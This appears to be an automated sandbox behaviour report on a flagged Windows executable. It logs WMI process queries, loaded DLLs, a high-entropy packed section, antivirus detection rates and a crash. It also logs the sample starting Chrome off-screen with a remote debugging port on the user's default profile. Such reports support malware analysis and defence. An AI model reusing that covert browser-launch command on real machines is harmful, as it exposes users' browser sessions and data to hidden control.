Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6796
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4756
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9064
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1736
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1304
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2588
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7328
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000006.00000002.1447407951.000017D40087E000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));

Source: R9rwNLVzpr.exe	ReversingLabs: Detection: 83%
Source: R9rwNLVzpr.exe	Virustotal: Detection: 79%

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

File read: C:\Users\user\Desktop\R9rwNLVzpr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\R9rwNLVzpr.exe "C:\Users\user\Desktop\R9rwNLVzpr.exe"
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4433649771088755692,3675350888853428571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2108 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4433649771088755692,3675350888853428571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4856 /prefetch:8
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7924 -s 2604
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4433649771088755692,3675350888853428571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2108 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4433649771088755692,3675350888853428571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4856 /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: R9rwNLVzpr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: R9rwNLVzpr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Runtime.Serialization.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdbW source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERF92.tmp.dmp.16.dr
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1590819562.000000001C035000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: R9rwNLVzpr.exe, 00000001.00000002.1591776135.000000001C84F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbpo+ source: R9rwNLVzpr.exe, 00000001.00000002.1590819562.000000001C035000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbSP source: R9rwNLVzpr.exe, 00000001.00000002.1592854943.000000001CA10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: indoC:\Windows\System.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbNT source: R9rwNLVzpr.exe, 00000001.00000002.1592305389.000000001C936000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF92.tmp.dmp.16.dr
Source:	Binary string: C:\Users\user\Desktop\R9rwNLVzpr.PDB= source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Runtime.Serialization.pdba source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\System.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1592513828.000000001C974000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\R9rwNLVzpr.PDBl source: R9rwNLVzpr.exe, 00000001.00000002.1592305389.000000001C936000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\System.pdbLa source: R9rwNLVzpr.exe, 00000001.00000002.1592513828.000000001C974000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R9rwNLVzpr.PDB source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\R9rwNLVzpr.PDBh source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1590911722.000000001C08A000.00000004.00000020.00020000.00000000.sdmp, R9rwNLVzpr.exe, 00000001.00000002.1591776135.000000001C84F000.00000004.00000020.00020000.00000000.sdmp, WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdbIL source: R9rwNLVzpr.exe, 00000001.00000002.1590819562.000000001C035000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Management.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: R9rwNLVzpr.exe, 00000001.00000002.1592854943.000000001CA10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pC:\Users\user\Desktop\R9rwNLVzpr.PDB source: R9rwNLVzpr.exe, 00000001.00000002.1582972095.00000000014F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Management.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Core.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.pdbE = source: R9rwNLVzpr.exe, 00000001.00000002.1592854943.000000001CA10000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Runtime.Serialization.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERF92.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbPo source: R9rwNLVzpr.exe, 00000001.00000002.1592305389.000000001C936000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERF92.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERF92.tmp.dmp.16.dr

Source: initial sample

Static PE information: section where entry point is pointing to: .hJL

Source: R9rwNLVzpr.exe	Static PE information: section name: .:"%
Source: R9rwNLVzpr.exe	Static PE information: section name: .W!:
Source: R9rwNLVzpr.exe	Static PE information: section name: .hJL

Source: R9rwNLVzpr.exe

Static PE information: section name: .hJL entropy: 7.536963336777202

Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R9rwNLVzpr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
